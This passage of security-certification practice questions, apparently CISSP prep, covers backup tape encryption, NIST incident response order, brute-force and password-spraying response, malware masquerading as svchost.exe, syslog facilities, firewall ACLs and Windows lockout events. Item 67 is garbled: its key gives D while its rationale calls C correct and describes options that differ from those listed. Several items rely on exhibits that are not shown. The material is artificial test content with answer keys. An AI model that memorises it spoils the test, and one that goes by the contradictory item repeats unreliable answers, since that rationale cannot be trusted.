Option C is correct: Restoring from off-site tapes (72 hours old) is the best course because they are not encrypted and provide a viable recovery point. Option A (pay ransom) is risky: no guarantee of decryption and encourages attackers. Option B (negotiate) wastes time.

Option D (rebuild without backup) is too slow and likely loses all data.

61
MCQeasy

An organization needs to ensure that backup tapes containing sensitive data are protected during transportation between sites. What is the most effective control?

A.Applying tamper-evident seals
B.Encrypting the backup tapes
C.Using a chain of custody log
D.Using a bonded courier service
AnswerB

Encryption protects data at rest in transit.

Why this answer

Encrypting the backup tapes ensures that even if the physical media is lost, stolen, or intercepted during transit, the sensitive data remains unreadable without the decryption key. This provides a strong, data-centric security control that protects confidentiality regardless of the physical security measures in place. Encryption is the most effective control because it directly addresses the risk of unauthorized access to the data itself.

Exam trap

The trap here is that candidates often choose a physical security control (like tamper-evident seals or bonded couriers) thinking it is sufficient, but the CISSP exam emphasizes that data-centric controls (encryption) are the most effective for protecting data in transit, as physical controls can be bypassed or fail.

How to eliminate wrong answers

Option A is wrong because tamper-evident seals only indicate whether the tape has been physically opened or tampered with; they do not protect the data from being read if the seal is bypassed or the tape is accessed through other means. Option C is wrong because a chain of custody log provides an audit trail of who handled the tape and when, but it does not prevent unauthorized access to the data if the tape is lost or stolen. Option D is wrong because a bonded courier service reduces the risk of theft or loss during transit, but it does not protect the data if the courier is compromised or the tape is intercepted; encryption is still needed to ensure confidentiality.

62
MCQeasy

You are the lead security analyst at a mid-sized financial services firm. At 2:15 PM, the SIEM alerts on multiple failed login attempts from an external IP address against the VPN gateway. The attempts stopped at 2:20 PM, but at 2:30 PM, a user reports that their account was used to send a phishing email to internal employees. You confirm that the user's account has been compromised. The CEO asks for an immediate update. What should be your FIRST action according to the incident response framework your company follows (based on NIST SP 800-61)?

A.Preserve forensic evidence by creating a disk image of the user's workstation.
B.Validate the incident and assess its scope and impact.
C.Immediately notify the legal and compliance teams.
D.Isolate the compromised workstation from the network.
AnswerB

Validation ensures it is a real incident; assessment prioritizes response.

Why this answer

According to NIST SP 800-61, the first phase of incident response is preparation, followed by detection and analysis. The SIEM alert and user report indicate a potential incident, but you must first validate the incident and assess its scope and impact before taking containment, eradication, or recovery actions. This ensures that resources are not wasted on a false positive and that the response is proportional to the actual threat.

Exam trap

The trap here is that candidates confuse containment actions (like isolation) with the first step, but NIST SP 800-61 mandates validation and scoping before any containment to ensure the response is appropriate and not disruptive.

How to eliminate wrong answers

Option A is wrong because preserving forensic evidence (e.g., creating a disk image) is a step that occurs after the incident has been validated and scoped; performing it prematurely could waste resources if the incident is a false positive or if the scope extends beyond that single workstation. Option C is wrong because notifying legal and compliance teams is a communication step that typically follows validation and initial containment, not the first action; immediate notification without confirmed scope could cause unnecessary escalation or legal exposure. Option D is wrong because isolating the compromised workstation is a containment action that should be taken after the incident is validated and its scope assessed; premature isolation could disrupt business operations or alert an attacker before full understanding of the incident.

63
MCQeasy

A security analyst detects repeated failed login attempts from a single external IP address targeting a user account. What is the best IMMEDIATE action?

A.Investigate the source IP's history
B.Block the IP address at the perimeter firewall
C.Disable the targeted user account
D.Enable account lockout after three failures
AnswerB

Immediately stops the attack.

Why this answer

Blocking the IP address at the perimeter firewall is the best immediate action because it stops the ongoing brute-force attack at the network boundary, preventing further authentication attempts without affecting the legitimate user's access. This aligns with the principle of containment in incident response, prioritizing rapid mitigation over investigation or configuration changes that could delay the response.

Exam trap

The trap here is that candidates confuse 'immediate action' with 'long-term fix' and choose to investigate the IP (A) or implement a policy change (D), failing to recognize that containment (B) must come first in the incident response process.

How to eliminate wrong answers

Option A is wrong because investigating the source IP's history is a forensic step that should follow containment, not precede it; delaying action allows the attack to continue. Option C is wrong because disabling the targeted user account would deny service to the legitimate user and does not address the external threat, which could simply pivot to another account. Option D is wrong because enabling account lockout after three failures is a preventive configuration change that takes time to implement and does not stop the current attack in progress; it also risks locking out the legitimate user if the attacker triggers the threshold.

64
MCQhard

A SOC analyst receives an alert for a suspicious outbound connection from a server in the DMZ to an external IP on port 443. The server is a web application server that should only communicate internally. The analyst checks the process and finds it is 'svchost.exe' running from a non-standard path. What is the most appropriate immediate action?

A.Isolate the server from the network
B.Initiate a full incident response investigation
C.Disregard the alert because svchost.exe is a legitimate Windows process
D.Terminate the suspicious process
AnswerA

Isolation stops the malicious outbound connection and prevents further damage, allowing for later forensic analysis.

Why this answer

Option A is correct because isolating the server immediately contains the threat, preventing potential data exfiltration or lateral movement from a compromised host. The suspicious outbound connection from a DMZ server to an external IP on port 443 (HTTPS) combined with 'svchost.exe' running from a non-standard path strongly indicates malware masquerading as a legitimate Windows process. In security operations, containment is the priority before investigation to minimize damage.

Exam trap

The trap here is that candidates may think terminating the process (Option D) is sufficient, but the CISSP emphasizes containment over eradication to prevent further compromise, and they may also mistakenly trust svchost.exe as always legitimate without verifying its path.

How to eliminate wrong answers

Option B is wrong because initiating a full incident response investigation without first containing the threat could allow the attacker to continue exfiltrating data or move laterally while the investigation proceeds; containment must come first. Option C is wrong because while svchost.exe is a legitimate Windows process, it should only run from C:\Windows\System32 or C:\Windows\SysWOW64, and a non-standard path is a classic indicator of malware impersonation; disregarding the alert would be negligent. Option D is wrong because terminating the suspicious process alone does not prevent the malware from restarting or other persistence mechanisms from activating, and it does not address the network-level threat; isolation is more comprehensive.

65
MCQeasy

Refer to the exhibit. The syslog-ng configuration is used to forward logs to a central server. What type of logs are being forwarded?

A.Authentication logs
B.Kernel logs
C.Daemon process logs
D.Security event logs
AnswerA

auth and authpriv are authentication-related.

Why this answer

The syslog-ng configuration shown uses the `auth` facility, which corresponds to authentication-related messages (e.g., login attempts, sudo usage, user authentication). The `auth` facility is specifically designated for security and authorization events, making option A correct.

Exam trap

The trap here is that candidates may confuse `auth` with generic 'security event logs' (option D), but syslog-ng uses specific facility names, and 'security' is not a valid facility; the correct facility for authentication/security is `auth` or `authpriv`.

How to eliminate wrong answers

Option B is wrong because kernel logs use the `kern` facility, not `auth`. Option C is wrong because daemon process logs use the `daemon` facility, not `auth`. Option D is wrong because while `auth` logs are security-related, the term 'security event logs' is ambiguous and not a standard syslog facility; the correct facility for security events is `auth` or `authpriv`.

66
MCQmedium

A security analyst notices repeated failed login attempts from an internal IP address on the domain controller. After enabling account lockout, the lockouts continue but the source IP changes. What is the best next step?

A.Analyze the log events to identify the attack pattern and implement additional controls such as MFA
B.Increase the account lockout threshold
C.Ignore the event as it is likely a false positive
D.Disable the user account being targeted
AnswerA

Understanding the attack pattern allows for targeted controls like requiring MFA for the targeted account or blocking the attack vector.

Why this answer

Option A is correct because the changing source IP indicates a distributed attack, likely a password spraying or brute-force attempt from multiple compromised hosts. Analyzing log events helps identify the attack pattern (e.g., timing, targeted accounts, source IP ranges) so you can implement additional controls like MFA, which mitigates credential-based attacks regardless of source IP changes. Account lockout alone is insufficient when attackers rotate IPs, as lockout policies are per-account and per-source, not adaptive to distributed sources.

Exam trap

The trap here is that candidates assume account lockout is sufficient and focus on tweaking lockout thresholds (Option B), but the changing source IP reveals a distributed attack that requires a different control like MFA, not just adjusting lockout parameters.

How to eliminate wrong answers

Option B is wrong because increasing the lockout threshold would allow more failed attempts before lockout, making the attack more successful and increasing the risk of account compromise; it does not address the root cause of distributed IPs. Option C is wrong because repeated failed login attempts from changing IPs are a clear indicator of an active brute-force or password spraying attack, not a false positive; ignoring it could lead to unauthorized access. Option D is wrong because disabling the targeted user account is a reactive, temporary measure that does not stop the attacker from targeting other accounts or using different credentials; it also disrupts legitimate user access without addressing the underlying attack vector.

67
MCQhard

Examine the Cisco ASA access-list named 'outside_in'. A penetration tester reports that they were able to establish an RDP session from an external IP address 203.0.113.55 to the internal host 10.10.10.10 on port 3389. Which configuration change would BEST prevent this while still allowing legitimate remote administration from the authorized management station?

A.Change the RDP rule to deny any source and add an explicit deny before the permit rules
B.Add an explicit deny rule for RDP from any source before the existing RDP rule, with logging enabled
C.Delete the second line (the HTTPS rule) and add a rule to deny RDP from all external sources
D.Modify the RDP rule to permit only from source host 192.168.1.100
AnswerD

Restricting the source to the authorized host prevents unauthorized external RDP connections.

Why this answer

Option C is correct because the current rule permits RDP from any host (192.168.1.100 is just a sample, but the rule actually allows any host due to the order; however the correct fix is to restrict the source to only 192.168.1.100. Option A incorrectly deletes a web rule; Option B blocks all RDP; Option D only adds logging, not restriction.

68
MCQhard

Refer to the exhibit. A security analyst reviews this event log entry. What does this event indicate?

A.A successful logon by the SYSTEM account
B.A successful logon by a user account
C.An attempted exploit of a privilege escalation vulnerability
D.A failed logon attempt due to account lockout
AnswerD

Event 4625 indicates failed logon, sub status shows lockout.

Why this answer

The event log entry shows a 'Logon Type 3' (network logon) with a 'Failure Reason' of 'Account locked out' and a 'Status' of 0xC0000234, which specifically indicates the account was locked due to too many failed attempts. This is a failed logon attempt, not a successful one, and the lockout status confirms the account was disabled for security reasons.

Exam trap

The trap here is that candidates see 'Logon Type 3' and assume it is a successful network logon, ignoring the failure status and lockout reason, or they misinterpret the lockout as a privilege escalation attempt.

How to eliminate wrong answers

Option A is wrong because the event shows a failure status (0xC0000234) and a failure reason of 'Account locked out', not a successful logon by any account including SYSTEM. Option B is wrong because the event explicitly indicates failure, not success, and the user account referenced is locked. Option C is wrong because this event does not show any privilege escalation exploit; it is a standard authentication failure due to account lockout, not an attack pattern like token manipulation or SeDebugPrivilege abuse.

Ready to test yourself?

Try a timed practice session using only Security Operations questions.